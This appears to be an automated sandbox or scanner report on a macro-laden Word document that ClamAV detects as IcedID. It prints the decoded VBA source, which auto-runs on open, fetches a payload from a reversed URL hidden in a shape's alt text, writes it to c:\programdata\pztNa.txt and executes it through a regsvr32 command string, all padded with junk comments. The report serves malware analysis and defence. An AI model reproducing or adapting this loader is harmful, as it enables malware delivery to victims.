Verdict: MALICIOUS
Risk Score: 230

Heuristics (6)

- ClamAV: Doc.Macro.ICEID1020-9781212-0 [critical] (CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
- VBA project inside OOXML [medium] (OOXML_VBA), 3 related findings
  Document contains a VBA project — VBA macros present
- CreateObject call [high] (OLE_VBA_CREATEOBJ)
  Matched line in script: Set yJPzr = CreateObject("Script" + sIqov)
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
  Matched line in script: Sub AutoOpen()
- Embedded URL [info] (EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12015 bytes |

SHA-256: 61fb52bbc2bf13e0ce16839137a0c2b77953e70984e13bd60899620734800d56

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UCgPC"
Sub xWHOS(kywbp, Optional ByVal ryWHh As String = "c:\programdata\pztNa.txt", Optional ByVal sIqov As String = "ing.FileSystemObject")
' Monomial cooperates hostilely
' Pitfall awkwardly conclusion plasm
' Florist worker
' Mullet aliening
' Resemble balmiest massages seeping postscripts
' Kloof zealots conurbations presence
' Pinning staccato luggage
' Feelings gazed dispirited replenish
' Loaves beating
' Ruminants nunnery ingoing mustard
' Mariner philology
' Gaoler schwa
Set yJPzr = CreateObject("Script" + sIqov)
' Obsolescent ballyhoo accusations
' Wrongly
' Holds stumbles finches impales
' Jeopardy arab payday
' Impassively virtually waited ails
' Earldoms wirings
' Fringy forbidden manors option
Set DPRgR = yJPzr.CreateTextFile(ryWHh)
' Fatwa girl inductance
' Kickstarted platen glaciology quenches chestnut hussies
' Roundels tormented
' Streaks mexican ouch
' Daintier phonograph
' Extrinsically dietician
' Convenors surely regression air screening
DPRgR.WriteLine kywbp
' Blueprint evoked extract endlessness defused
' Phonographic tyrannous corroborative sonorous
' Adieus sunlight
' Coincided task cortical
' Memphis falsifying gobbledegook roentgen rippers recouple flagships
DPRgR.Close
' Affronts strongroom decider spurns illhumoured robustness accursed
' Positioning
' Deficit hypnotism
' Abducting smothered
' Markers chain vanities treachery
' Colouration visually embezzling mandate
' Untapped retrain
' Merchants particulates veil luckier lampooned bourgeois
' Miler cogitated
' Reforms contributes relegating educationalist raft
' Surrounded hostelries
' Reverentially hugeness nourish initialisation
' Fowl fruitcakes unadulterated
' Doggy logician singlehanded clipboards
' Sprayer celestial ineffectually deities restlessly teds
' Sedates hackneyed
' Misplaces ace attrition
' Fanned redress collimation atrociously
' Messengers optimality screechiest selfcontrolled nodded
' Posthumously
' Denizens
' Abbey actuated juxtaposes grating
' Leases
' Anticipated missing
' Naiads sprawls hundreds smoulder whether
' Surveyor cheated pompeii
' Enunciation capacitive dilute
' Predefine asymmetric toppling pumps brass
' Honors
' Decrying clenching stripiest razorblades
' Microscopist augments zoom repudiating reimbursing psycholinguistics
' Emotive quovadis maseru changeless
' Riling vernier mine
' Mastodons lonely
' Sideshows liquify basses
' Exhaustive plops malignancy glamour
' Narrower pussy polytopes unmentionables
' Baud
' Marker placentae
' Alabaster
' Unbearably laterally solids
End Sub
' Sonority docs
' Streamlines quibbling evaporating
' Peeper chats unblemished theoretically rapt trilateral
' Jeopardising composedly absolutes wounds
Sub AutoOpen()
' Original dismissive unfledged
' Collaterally
' Ember meteoric summoner browses
' Bisexuality demystification
' Nun zipping
' Preclude latch
' Accusingly narrators
' Absolving timbre
' Marvellously
' Endanger stockbroker
' Thimble systoles
' Pluses intercepted
' Augmentations inner newscasters
' Recoups misidentification patrols insignificantly
' Triplex navigated usurer
' Burly ridiculing
' Mitigates munich nameplates schoolboys cajole toughest
' Massless barrelled hottempered inroad perchlorate chortling headier
' Irreproachable equalised scholarship
' Indifference contestable earthlings fries bunched
' Physiologically rodents excelsior
' Refreshed ovens roofing liveliest excluded
' Plimsolls interferon
' Recheck pouffes primogeniture comedian
' Proclaim deficient
' Costeffectiveness unexploited delusion
Dim JfqEc As New njGZm
' Swelling
' Interconnection regatta borrowings assort
' Paralysed snobbery
' Prefaces
kywbp = JfqEc.JnbRr("MSXML2.serverXMLHTTP")
' Inclusions unconvincing wiles dipped
' Hepatitis haughty integrations shadeless
' Trudges
' Tapping breathless influenza
' Grip eroding peacefulness impelled directionality
' Ethicist impales antiseptic
xWHOS ZfFJa(kywbp)
' Waif addition
' Sexed snubs mechanistic stiffly gobi
' Tug
' Aerodynamics comprehensibility frequency astrophysicists
' Dusters halfhearted jolting callowness decadent
' Tailspin canopy
' Limelight wool furred impeded pressups conditionally
' Regurgitate outlooks marquess bastard
' Horror presidency
UiQiN hTTUU(0) + "vr32 c:\programdata\pztNa.txt", "ws"
End Sub
Function vaCEk(HQFhs, MRRid)
' Aura outlived purposelessly
' Congressmen updated obelisks
' Bestial pretty hoodwink rarefied
' Keenest avenue interweaving denude
' Actualisation irritation reappraising
' Differential buttocks amorously oxtails wanting promontories
vaCEk = Split(HQFhs, MRRid)
End Function
Attribute VB_Name = "HYRQB"
' Ennoble reigns familiarise
' Strengths finisher survival colourful
' Concisely rankest
' Furling squiggles roasted
' Sportsmanship moderating midas unfrequented planter encroach squid silliness
Function ZfFJa(wTiOv)
' Revolving speared ample
' Propulsion reducers
' Stoke condemnations treatises untethered
' Provincialism camels airport flee cryptanalysis
' Biography codes
ZfFJa = StrConv(wTiOv, vbUnicode)
' Glimpsed radii digitised wed grilling roughens
' Curiosities denser ethology armhole
' Legal averted
' Dowel
' Folklore halftruth ranted
End Function
' Chores
' Guillotines
' Tauntingly finance facade
' Drivel seize snowy incriminated
' Pentagrams slushes tussle italicised
' Hotrod nutritionist scornfully infantrymen substrata
Function LCOFb()
' Makeover animation uncircumcised
' Instructive desired interceptors capstan
' Espousal alterations
' Evacuee fizzles
' Forerunners
' Mystification clubfooted ides
' Quiveringly passmark
' Fathersinlaw straggling inoculations
' Utilities
' Rickshas retinas
With ActiveDocument.shapes(1)
LCOFb = .AlternativeText
End With
End Function
' Horridly sequins herbalists underlay
' Afghans compound
' Hiking enounced idolaters
' Assassinating reimplementing negotiated necked breakdown
' Gorse oolitic rearms petitions customer
' Lire wellreceived
' Primeness fobbing
Function hTTUU(DPahG)
' Normalisations glint
' Depreciating
' Sequel kindergartens
' Osprey shinbone tickling dreariness cognates
' Premeditated amateurish matures frivol
' Extinctions
' Bandwagon stenography early
' Roarer goodies tobacconists persecutions desecrate dioptres
' Exchangers surface brightens sympathised
' Curves emanate battened
' Welladjusted wilt wildlife
TFtap = LCOFb()
exSMS = vaCEk(TFtap, "###")
qsnEd = exSMS(DPahG)
hTTUU = qsnEd
End Function
Attribute VB_Name = "njGZm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Omnipotence funny middleage chances quickening
' Plummeting sponginess
' Utility cheeriest allotropic crashers
' Moles claustrophobia tweet franked lucidly
' Cuddliest rissole click
' Crowds
' Achievements ingrate gumtrees lizards
Function JnbRr(gIbIK)
' Hangup gravedigger forefather stoic circumscribed
' Sidelight contexts
' Continually
' Avert chains cited
Dim hagRa As Object
' Workable
' Dozed function metropolitan
' Smut tend guava spawns
' Commutator guessing skippers checkout buckled
' Frugally delta unhesitating
' Melting
' Annihilation
' Raining begets
' Tipoff overpaid mull caretaker
' Perigee stodgier
Set hagRa = CreateObject(gIbIK)
' Novice triumphs phenotype chaos
' Porcupine promenades pilaster
' Igniter vowels joyriding
' Teeing
' Anecdote
' Clairvoyance
' Macro chafed scrape gleefully epistemic
' Proclaimers boutiques unadvertised particularity
' Toughest
' Progression unreadability adenine
' Overcast presenting higgledypiggledy
' Linkages enzymatic unhappiness
' Amphetamine
' Secularism detaches interjected speared
' Midfield regress
' Foresail bloodthirstiest architecturally mailorder
' Traceless doubletalk quasilinear stymie success sweating
' Bothering hydroelectric shrieker
' Starfish outbids hoes deer
' Blocking flapper ranching
' Redistributions allocation creepers
' Blinded saturates desorption downright cryogenics undisputed prefabrication
bemkM = hTTUU(1)
' Acrylics temperaments recall sceptically frictions
' Immense arrogantly
' Edginess contractor pressurises yemen incompatibility
' Distracting misspelt codicils
' Seamstresses discharges unshakeable dor
' Mistranslates blood indissoluble
hagRa.Open "GET", Reverse(bemkM), False
' Serpentine decoke modernising transferral
' Bookie clockmaker
' Rioted ability
' Cordage purporting capability howled devalued
' Stupidly fringe litotes liveliness
' Grumpiest leaven
' Alkalise batten
hagRa.Send
' Occasionally histamine calico venture
' Mayoralty harassers chronicled rem
' Seal underwriting
' Bowls wireless dahomey russian beadle dissimulation attitudes
' Boreal blobs preface stroke
' Adagio popularity
JnbRr = hagRa.responsebody
End Function
Attribute VB_Name = "FROCO"
Sub UiQiN(hxXEo, BjJKh)
' Camping douse psychiatrist
' Sprains
' Inorganic
' Centrifuges solenoid complainingly
Set XJLXs = CreateObject(BjJKh + "cript.shell")
' Yawn freaky logged corrupt
' Urticaria break citadel
' Particularism welcomer referenda aggregates socialist regains
' Proposing relocked unicameral contiguity retorted
' Broadmindedness hilt vocalising loanword
' Achingly
' Chilean hydrochloric apprenticeship
' Disregard humankind
' Observations bindery
' Monologues interrogatives netting scouting
' Patricians degeneracies tolerances tendons
' Worldly enveloper
' Blinkered psychotherapy loaned drama
' Neutrino traceless replenish guiders
' Throttled carvings theology additions
' Hairpiece literally percept
' Babysit overhangs pseudonymous commonlaw circularise
' Plutonium reformulates
' Benefice duds jargons mistakenly yogi
' Rudely
' Spook protractors market
' Wisecracks lees monomers
' Debriefing stuffed boundless
' Sharpeners presides crumbs switched shutter gapingly
' Outsiders offences transportation tram aggregates
' Cogent yard tasting jetpropelled
' Shirts interlap mattering
' Phrasebook
' Controversial suitably gut flame vandalised upheavals dryers
' Consonants football hotspots hydroelectric dramatists
' Significances genoa
' Vampire readiness bulldozed unaesthetic satirising
' Impossible jailer widget situate coughs acrylics
' Microdot roundel valiant
' Gale smothers faxed
' Remnants underground
' Diplomacy depolarisation
' Custodians keen undiscriminated
' Royalists innovator federated frivolity jelly concedes
' Livens intergovernmental asymptotes
' Blankets legalities dowdiest omnibuses average
' Nomadic feels victory
' Unassertive sponsors
' Quieting realignments unborn
' Strawberry fetches tribally
' Dramatised invalided
' Sputter burger compelled poplar convinced sculleries
' Playmate cinder trashy quantise fizzles
' Corporeal brunet pectin suzerainty remnants
' Tasters rheological typesets evasive
' Tripled fledged clearings electing
' Roistering
XJLXs.exec hxXEo
' Landlocked noduled headed unfirm
' Tucked ploughshare
' Boosters sailor protactinium
' Lapdog accredits interrogate nymph
' Boardgames methyl handcuffing
' Shuddering kinds nauseating allege seafarers suspicions
End Sub
(end of script preview)

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes |

SHA-256: 9e65f2dbf49676076639540c5ed56ae4c6b088b0661dc4b8879280f35605b42a

Detection: ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely